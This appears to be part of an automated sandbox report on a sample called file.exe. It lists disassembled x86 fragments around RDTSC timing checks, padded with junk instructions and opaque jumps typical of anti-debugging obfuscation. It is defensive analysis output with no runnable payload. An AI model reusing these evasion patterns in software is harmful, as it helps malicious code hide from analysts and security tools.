    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B284DB second address: B284F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB4CD14683Ch 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B28688 second address: B2868C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B287C1 second address: B287D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146844h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B287D9 second address: B287E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B287E8 second address: B28812 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4CD146836h 0x00000008 jmp 00007FB4CD14683Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007FB4CD146842h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B28B63 second address: B28BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD3D7AACh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FB4CD3D7AB8h 0x00000012 jmp 00007FB4CD3D7AB2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B28E3F second address: B28E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146846h 0x00000009 ja 00007FB4CD146836h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007FB4CD14683Fh 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B2A910 second address: B2A9BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a xor dword ptr [esp], 05E8FB1Dh 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FB4CD3D7AA8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FB4CD3D7AB1h 0x00000030 mov edx, dword ptr [ebp+122D3521h] 0x00000036 push 00000003h 0x00000038 sbb ecx, 589DFA81h 0x0000003e push 00000000h 0x00000040 jc 00007FB4CD3D7AA8h 0x00000046 mov esi, dword ptr [ebp+122D36F1h] 0x0000004c push 00000003h 0x0000004e call 00007FB4CD3D7AB6h 0x00000053 pop edi 0x00000054 call 00007FB4CD3D7AA9h 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FB4CD3D7AB3h 0x00000061 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A9BE second address: B2AA1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146843h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB4CD14683Eh 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FB4CD146848h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push ebx 0x0000001a pushad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d jl 00007FB4CD146836h 0x00000023 popad 0x00000024 pop ebx 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FB4CD14683Ch 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AA1D second address: B2AA31 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4CD3D7AA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AA31 second address: B2AA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB4CD146836h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 xor ebx, dword ptr [ebp+122D3791h] 0x0000001a mov dword ptr [ebp+122D186Ah], edi 0x00000020 popad 0x00000021 lea ebx, dword ptr [ebp+1245168Ah] 0x00000027 mov dword ptr [ebp+122D292Dh], ecx 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AA65 second address: B2AA6B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AADF second address: B2AAE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AAE5 second address: B2AB30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FB4CD3D7AAEh 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2925h], edi 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D1ED4h], edi 0x0000001e call 00007FB4CD3D7AA9h 0x00000023 jmp 00007FB4CD3D7AB6h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AB30 second address: B2AB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AC33 second address: B2AC3D instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4CD3D7AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C3A8 second address: B4C3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C3AD second address: B4C3CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FB4CD3D7AA6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4CD3D7AADh 0x00000011 jnc 00007FB4CD3D7AA6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22F59 second address: B22F6A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB4CD14683Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A209 second address: B4A228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB4CD3D7AB1h 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FB4CD3D7AA6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A228 second address: B4A232 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB4CD146836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A4A1 second address: B4A4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22F63 second address: B22F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A627 second address: B4A65D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FB4CD3D7AB6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A65D second address: B4A677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD146844h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A677 second address: B4A67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A67B second address: B4A69D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FB4CD146849h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A927 second address: B4A92F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A92F second address: B4A939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB4CD146836h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A939 second address: B4A93D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A93D second address: B4A949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A949 second address: B4A94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A94D second address: B4A962 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4CD146836h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A962 second address: B4A966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A966 second address: B4A96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ADBF second address: B4ADC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ADC3 second address: B4ADD2 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4CD146836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF14 second address: B4AF1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4BD5B second address: B4BD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4BEDC second address: B4BEF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4BEF0 second address: B4BF0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB4CD146849h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4BF0F second address: B4BF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DA84 second address: B4DA98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FB4CD146838h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DA98 second address: B4DAAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007FB4CD3D7ACBh 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FB4CD3D7AA6h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DAAD second address: B4DAC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD14683Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5584A second address: B55854 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4CD3D7AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A783 second address: B5A79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146847h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A79E second address: B5A7CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB4CD3D7AABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB4CD3D7AB5h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A7CA second address: B5A7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59EB3 second address: B59EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C356 second address: B5C37B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FB4CD146836h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 6EEF94B0h 0x00000015 mov si, ax 0x00000018 call 00007FB4CD146839h 0x0000001d pushad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C37B second address: B5C388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007FB4CD3D7AACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C388 second address: B5C392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C392 second address: B5C39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C39B second address: B5C39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C39F second address: B5C3FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FB4CD3D7AB3h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jmp 00007FB4CD3D7AAFh 0x00000018 pushad 0x00000019 jg 00007FB4CD3D7AA6h 0x0000001f jmp 00007FB4CD3D7AB4h 0x00000024 popad 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b pushad 0x0000002c je 00007FB4CD3D7AA6h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C3FA second address: B5C413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB4CD146842h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C532 second address: B5C53C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB4CD3D7AA6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5CAE0 second address: B5CAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5CAE4 second address: B5CAEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D0EF second address: B5D0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D0F4 second address: B5D145 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FB4CD3D7AA8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov edi, 0F29D4F1h 0x0000002a nop 0x0000002b jmp 00007FB4CD3D7AB7h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push edi 0x00000035 pop edi 0x00000036 push edx 0x00000037 pop edx 0x00000038 popad 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D145 second address: B5D14A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D41E second address: B5D422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D422 second address: B5D426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D426 second address: B5D45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB4CD3D7AB8h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB4CD3D7AB5h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D45E second address: B5D462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D743 second address: B5D7A5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB4CD3D7AA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB4CD3D7AB7h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FB4CD3D7AA8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push eax 0x0000002c js 00007FB4CD3D7AACh 0x00000032 sub dword ptr [ebp+122D292Dh], edx 0x00000038 pop esi 0x00000039 xchg eax, ebx 0x0000003a jc 00007FB4CD3D7AB4h 0x00000040 pushad 0x00000041 jno 00007FB4CD3D7AA6h 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C343 second address: B1C34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB4CD146836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60BAA second address: B60BB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6031A second address: B60328 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60328 second address: B6032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60BB0 second address: B60BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD146849h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60BCD second address: B60BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6032C second address: B60332 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61648 second address: B61651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61651 second address: B6165E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6165E second address: B61662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62B20 second address: B62B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62B24 second address: B62BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FB4CD3D7AA8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007FB4CD3D7AA8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 jmp 00007FB4CD3D7AAEh 0x00000045 xchg eax, ebx 0x00000046 jmp 00007FB4CD3D7AB5h 0x0000004b push eax 0x0000004c pushad 0x0000004d jmp 00007FB4CD3D7AB8h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B636F8 second address: B636FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B636FC second address: B63727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB4CD3D7AB9h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jbe 00007FB4CD3D7AA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64175 second address: B64189 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146840h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64189 second address: B6418E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64A02 second address: B64A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64A06 second address: B64A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
